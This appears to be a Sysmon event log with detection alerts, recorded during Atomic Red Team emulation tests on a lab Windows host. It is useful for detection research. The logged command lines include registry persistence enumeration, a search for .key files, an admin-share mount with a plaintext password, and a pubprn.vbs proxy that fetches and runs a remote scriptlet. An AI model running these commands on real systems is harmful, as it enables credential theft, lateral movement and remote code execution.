747F3D96-D87C-5D31-0000-0010CA5B3100 + 956 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.678107,2019-07-19T18:49:32.678107+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3693 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.629 + 747F3D96-D87C-5D31-0000-00103F573100 + 2440 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.585243,2019-07-19T18:49:32.585243+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3691 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.541 + 747F3D96-D87C-5D31-0000-0010B4523100 + 4016 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.497481,2019-07-19T18:49:32.497481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3689 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.447 + 747F3D96-D87C-5D31-0000-0010264E3100 + 1428 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.41339,2019-07-19T18:49:32.413390+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3687 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.377 + 747F3D96-D87C-5D31-0000-001097493100 + 1680 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.335446,2019-07-19T18:49:32.335446+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3685 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.284 + 747F3D96-D87C-5D31-0000-001009453100 + 5016 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.249442,2019-07-19T18:49:32.249442+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3683 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.212 + 747F3D96-D87C-5D31-0000-00107A403100 + 5984 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.180586,2019-07-19T18:49:32.180586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3681 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.135 + 747F3D96-D87C-5D31-0000-0010E83B3100 + 2888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.150327,2019-07-19T18:49:32.150327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3680 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:31.675 + 747F3D96-D87B-5D31-0000-0010D92D3100 + 3188 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547737.570057,2019-07-19T18:48:57.570057+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /S /D /c" dir c:\ /b /s .key " ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3678 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:57.532 + 747F3D96-D859-5D31-0000-001045922F00 + 6220 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /S /D /c" dir c:\ /b /s .key " + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D859-5D31-0000-0010FB8F2F00 + 888 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547737.557947,2019-07-19T18:48:57.557947+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3677 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:57.502 + 747F3D96-D859-5D31-0000-0010FB8F2F00 + 888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547737.524876,2019-07-19T18:48:57.524876+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "echo " "ATOMICREDTEAM > %%windir%%\cert.key" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3676 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:57.433 + 747F3D96-D859-5D31-0000-0010E68C2F00 + 6524 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "echo " "ATOMICREDTEAM > %%windir%%\cert.key" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547737.466584,2019-07-19T18:48:57.466584+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3675 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:46.221 + 747F3D96-D84E-5D31-0000-00102C702F00 + 1628 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Process - Created,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3674 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:41.103 + 747F3D96-D849-5D31-0000-00103C522F00 + 6068 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D849-5D31-0000-0010E54F2F00 + 3284 + C:\Windows\System32\cmd.exe + cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Network,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3674 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:41.103 + 747F3D96-D849-5D31-0000-00103C522F00 + 6068 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D849-5D31-0000-0010E54F2F00 + 3284 + C:\Windows\System32\cmd.exe + cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547721.109076,2019-07-19T18:48:41.109076+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3673 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:41.068 + 747F3D96-D849-5D31-0000-0010E54F2F00 + 3284 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D849-5D31-0000-0010914D2F00 + 2096 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547721.085108,2019-07-19T18:48:41.085108+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3672 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:41.034 + 747F3D96-D849-5D31-0000-0010914D2F00 + 2096 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547717.347265,2019-07-19T18:48:37.347265+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3670 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:37.099 + 747F3D96-D845-5D31-0000-001098212F00 + 2624 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1563547717.264352,2019-07-19T18:48:37.264352+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) in directory : ( C:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3669 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:36.869 + 747F3D96-D844-5D31-0000-0010C70A2F00 + 2484 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 747F3D96-D844-5D31-0000-001075082F00 + 7140 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547716.882586,2019-07-19T18:48:36.882586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3668 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:36.811 + 747F3D96-D844-5D31-0000-001075082F00 + 7140 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547716.834888,2019-07-19T18:48:36.834888+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3667 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:31.222 + 747F3D96-D83F-5D31-0000-00105EF22E00 + 4888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 